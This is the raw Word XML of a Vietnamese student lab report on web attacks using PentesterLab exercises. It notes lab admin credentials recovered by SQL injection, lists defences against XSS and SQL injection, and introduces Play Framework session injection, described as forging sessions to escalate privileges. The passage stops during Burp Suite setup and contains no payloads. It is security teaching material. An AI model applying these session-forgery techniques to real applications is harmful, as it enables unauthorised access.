    <w:p w14:paraId="2C38C735" w14:textId="393049EA" w:rsidR="00C24677" w:rsidRPr="00F12C2B" w:rsidRDefault="00283404" w:rsidP="00C24677">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="24D92369">
          <v:shape id="Hình ảnh 64" o:spid="_x0000_i1086" type="#_x0000_t75" style="width:468pt;height:147.75pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId72" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="193EF906" w14:textId="77777777" w:rsidR="00C24677" w:rsidRPr="00F12C2B" w:rsidRDefault="00C24677" w:rsidP="00C24677">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FE41A92" w14:textId="3D009AAC" w:rsidR="00C24677" w:rsidRPr="00F12C2B" w:rsidRDefault="00283404" w:rsidP="00C24677">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="6055A80A">
          <v:shape id="Hình ảnh 5" o:spid="_x0000_i1087" type="#_x0000_t75" style="width:396.75pt;height:157.5pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId73" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDC2025" w14:textId="7A41444F" w:rsidR="00C24677" w:rsidRPr="00F12C2B" w:rsidRDefault="00C24677" w:rsidP="00C24677">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Như vậy tài khoản và mật khẩu của quản trị viên lần lượt là: Admin</w:t>
      </w:r>
      <w:r w:rsidR="00063B60" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>P4ssw0rd.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C9DB65" w14:textId="5B3A8FC6" w:rsidR="00C24677" w:rsidRPr="00F12C2B" w:rsidRDefault="00C24677" w:rsidP="00C24677">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cách phòng chống</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F29520" w14:textId="31337040" w:rsidR="00C24677" w:rsidRPr="00F12C2B" w:rsidRDefault="00C24677" w:rsidP="00C24677">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00063B60" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Các dòng firewall,</w:t>
      </w:r>
      <w:r w:rsidR="00063B60" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>mod security,</w:t>
      </w:r>
      <w:r w:rsidR="00063B60" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>next generation firewall có thể phòng chống lại các cuộc tấn công XSS ở mức căn bản,</w:t>
      </w:r>
      <w:r w:rsidR="00063B60" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>hạn chế.</w:t>
      </w:r>
      <w:r w:rsidR="00063B60" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Ở mức độ chuyên sâu </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>hơn,ta</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> cần sử dụng tường lửa ứng dụng web-Web Application Firewall(WAF).WAF là một công nghệ tường lửa bảo mật giúp bảo vệ các ứng dụng web khỏi các lỗi bảo mật dựa trên ứng dụng web và HTTP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EDDA66" w14:textId="320F0A25" w:rsidR="00362567" w:rsidRPr="00F12C2B" w:rsidRDefault="00C24677" w:rsidP="00C24677">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SQL injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>: Lọc dữ liệu từ người dùng.</w:t>
      </w:r>
      <w:r w:rsidR="00063B60" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Sử dụng các filter để lọc các kí tự đặc </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>biệt.Sử</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> dụng parameter thay vì cộng chuổi để tạo SQL.Không hiển thị exception,messenger lỗi,vì hacker có thể dựa vào thông báo lỗi tìm cấu trúc database.Phân quyền cho người sử dụng.Backup dữ liệu thường xuyên.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026A18A6" w14:textId="3E11372C" w:rsidR="00FA2235"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3: </w:t>
      </w:r>
      <w:r w:rsidR="00F12C2B" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>PLAY SESSION INJECTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357E58AB" w14:textId="6E685A28" w:rsidR="00F12C2B" w:rsidRPr="00F12C2B" w:rsidRDefault="00F12C2B" w:rsidP="00F12C2B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1.Giới thiệu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D69EBB" w14:textId="6576804E" w:rsidR="00F12C2B" w:rsidRDefault="00F12C2B" w:rsidP="00F12C2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Link bài lab: </w:t>
      </w:r>
      <w:hyperlink r:id="rId74" w:history="1">
        <w:r w:rsidRPr="00AF083F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.pentesterlab.com/exercises/play_session_injection/course</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7467F533" w14:textId="2AE255B4" w:rsidR="00F12C2B" w:rsidRDefault="00F12C2B" w:rsidP="00F12C2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Ở phần trước chúng ta đã tìm hiểu về kỹ thuật tấn công Xss và Sql injection. Tôi cần bạn nắm vững kiến thức ở bài tập 1 để tiến hành thực hành bài tập 2. Trong phần này tôi sẽ giới thiệu cho các bạn về kỹ thuật tấn công Play Session Injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53369ACA" w14:textId="77777777" w:rsidR="00F12C2B" w:rsidRDefault="00F12C2B" w:rsidP="00F12C2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>ꞏ</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Session Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00486AFF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00486AFF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>khai thác phiên làm việc trong play Framework,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00486AFF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>làm xáo trộn nội dung của phiên trong khi bỏ qua cơ chế</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> ký, giả mạo phiên làm việc của nạn nhân.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DD1B8F" w14:textId="5022C5DE" w:rsidR="00F12C2B" w:rsidRDefault="00F12C2B" w:rsidP="00F12C2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>ꞏ</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Play Framework</w:t>
      </w:r>
      <w:r w:rsidRPr="00486AFF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00486AFF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">là một </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">khung ứng dụng web mã nguồn mở, </w:t>
      </w:r>
      <w:r w:rsidRPr="00486AFF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>dùng để tạo các ứng dụng website,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00486AFF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>được viết sẵn bằng Scala và Java theo kiến trúc model-view-controller (MVC).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00486AFF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Play được tạo ra với mục đích tang hiệu suất lập trình bằng cách sử dụng quy ước cấu hình,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00486AFF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>tải lại mã nóng và hiển thị lỗi trên trình duyệt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643E1DFC" w14:textId="68763906" w:rsidR="00F12C2B" w:rsidRDefault="00F12C2B" w:rsidP="00F12C2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00486AFF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Mục đích của phần</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> bài tập này là </w:t>
      </w:r>
      <w:r w:rsidRPr="00486AFF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>trình bày chi tiết về k</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>ỹ</w:t>
      </w:r>
      <w:r w:rsidRPr="00486AFF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> thuật khai thác phiên làm việc trong Play Framework.Vấn đề này có thể được sử dụng để đưa nội dung tùy ý vào trong phiên và sửa đổi chúng để nâng cấp đặc quyền trong phiên làm việc phục vụ mục đích nào đó</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> của kẻ tấn công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A768A00" w14:textId="6F496841" w:rsidR="00F12C2B" w:rsidRDefault="00F12C2B" w:rsidP="00F12C2B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>2.Khai thác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B41351A"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ài tập thực hành này được tôi demo và thực hiện thông qua trang web pentesterlab.com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9EFFE8"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Đầu tiên ta truy cập vào trang pentesterlab để tiến hành downloads file ISO.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CC62D7" w14:textId="43C6B53B" w:rsidR="00F12C2B" w:rsidRPr="00F12C2B" w:rsidRDefault="00283404" w:rsidP="00F12C2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:pict w14:anchorId="2CC46A06">
          <v:shape id="Hình ảnh 13" o:spid="_x0000_i1088" type="#_x0000_t75" style="width:369pt;height:177.75pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId75" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F899D0"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 xml:space="preserve">Tiếp theo tiến hành cài đặt file ISO theo cách mà tôi đã thực hiện ở lab1.Sau khi quá trình cài đặt hoàn </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>thành,ta</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> được:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543193E2" w14:textId="22229F3D" w:rsidR="00F12C2B" w:rsidRPr="00F12C2B" w:rsidRDefault="00F12C2B" w:rsidP="00F12C2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00283404">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:pict w14:anchorId="782880FA">
          <v:shape id="Hình ảnh 15" o:spid="_x0000_i1089" type="#_x0000_t75" style="width:401.25pt;height:354.75pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId76" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D031E58"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 xml:space="preserve">Tiếp tục khởi động máy </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ảo,sau</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> đó ghi địa chỉ IP vào thanh URl trên trình duyệt ta được.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAFD642" w14:textId="3075CF86" w:rsidR="00F12C2B" w:rsidRPr="00F12C2B" w:rsidRDefault="00283404" w:rsidP="00F12C2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:pict w14:anchorId="35BE1003">
          <v:shape id="Hình ảnh 24" o:spid="_x0000_i1090" type="#_x0000_t75" style="width:385.5pt;height:90pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId77" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BB75F9" w14:textId="4C906D19" w:rsidR="00F12C2B" w:rsidRPr="00F12C2B" w:rsidRDefault="00283404" w:rsidP="00F12C2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:pict w14:anchorId="7F4BFF78">
          <v:shape id="Hình ảnh 20" o:spid="_x0000_i1091" type="#_x0000_t75" style="width:352.5pt;height:151.5pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId78" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A99CB0" w14:textId="373F02A8"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Trước khi thực hiện bài lab này,</w:t>
      </w:r>
      <w:r w:rsidR="00585AD7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ta cần cài đặt công cụ Burpsuite,</w:t>
      </w:r>
      <w:r w:rsidR="00585AD7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>một công cụ đắt lực trong việc</w:t>
      </w:r>
      <w:r w:rsidR="00585AD7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>kiểm tra bảo mật và khai thác xâm nhập web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AECCD80"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Các bước cài đặt Burpsuite:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29947EDE" w14:textId="0755CA3D"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ước 1:</w:t>
      </w:r>
      <w:r w:rsidR="00585AD7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Tiến hành vào trang chủ portswigger.net để tải về Burpsuite Community và chọn phiên bản Windows (64 bit) dành cho Windows x64.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D3DC8C" w14:textId="24EEAC51"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69E305ED">
          <v:shape id="Hình ảnh 27" o:spid="_x0000_i1092" type="#_x0000_t75" style="width:369.75pt;height:3in;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId79" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC0AECB" w14:textId="2B5CDF49"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48F580A0">
          <v:shape id="Hình ảnh 31" o:spid="_x0000_i1093" type="#_x0000_t75" style="width:368.25pt;height:85.5pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId80" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFE639B" w14:textId="013C4C86"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ước 2:</w:t>
      </w:r>
      <w:r w:rsidR="00585AD7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Tiếp theo ta tiến hành tải và cài đặt môi trường java cho burpsuite.</w:t>
      </w:r>
    </w:p>
